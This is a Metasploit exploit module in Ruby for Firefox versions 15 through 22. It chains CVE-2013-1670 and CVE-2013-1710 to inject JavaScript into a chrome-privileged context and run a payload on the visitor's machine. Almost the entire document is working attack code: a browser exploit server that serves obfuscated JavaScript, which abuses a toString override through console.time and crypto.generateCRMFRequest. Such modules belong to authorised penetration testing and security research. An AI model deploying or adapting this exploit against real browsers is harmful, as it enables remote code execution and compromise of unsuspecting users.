Firefox toString console.time Privileged Javascript Injection

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
require 'rex/exploitation/jsobfu'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::BrowserExploitServer  
include Msf::Exploit::Remote::BrowserAutopwn  
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation  
  
autopwn_info({  
:ua_name => HttpClients::FF,  
:ua_minver => "15.0",  
:ua_maxver => "22.0",  
:javascript => true,  
:rank => ExcellentRanking  
})  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Firefox toString console.time Privileged Javascript Injection',  
'Description' => %q{  
This exploit gains remote code execution on Firefox 15-22 by abusing two separate  
Javascript-related vulnerabilities to ultimately inject malicious Javascript code  
into a context running with chrome:// privileges.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'moz_bug_r_a4', # discovered CVE-2013-1710  
'Cody Crews', # discovered CVE-2013-1670  
'joev' # metasploit module  
],  
'DisclosureDate' => "May 14 2013",  
'References' => [  
['CVE', '2013-1670'], # privileged access for content-level constructor  
['CVE', '2013-1710'] # further chrome injection  
],  
'Targets' => [  
[  
'Universal (Javascript XPCOM Shell)', {  
'Platform' => 'firefox',  
'Arch' => ARCH_FIREFOX  
}  
],  
[  
'Native Payload', {  
'Platform' => %w{ java linux osx solaris win },  
'Arch' => ARCH_ALL  
}  
]  
],  
'DefaultTarget' => 0,  
'BrowserRequirements' => {  
:source => 'script',  
:ua_name => HttpClients::FF,  
:ua_ver => lambda { |ver| ver.to_i.between?(15, 22) }  
}  
))  
  
register_options([  
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])  
], self.class)  
end  
  
def on_request_exploit(cli, request, target_info)  
send_response_html(cli, generate_html(target_info))  
end  
  
def generate_html(target_info)  
key = Rex::Text.rand_text_alpha(5 + rand(12))  
opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin  
  
js = Rex::Exploitation::JSObfu.new(%Q|  
var opts = #{JSON.unparse(opts)};  
var key = opts['#{key}'];  
var y = {}, q = false;  
y.constructor.prototype.toString=function() {  
if (q) return;  
q = true;  
crypto.generateCRMFRequest("CN=Me", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", "#{Rex::Text.rand_text_alpha(5 + rand(12))}", null, key, 1024, null, "rsa-ex");  
return 5;  
};  
console.time(y);  
|)  
  
js.obfuscate  
  
%Q|  
<!doctype html>  
<html>  
<body>  
<script>  
#{js}  
</script>  
#{datastore['CONTENT']}  
</body>  
</html>  
|  
end  
end  
  
`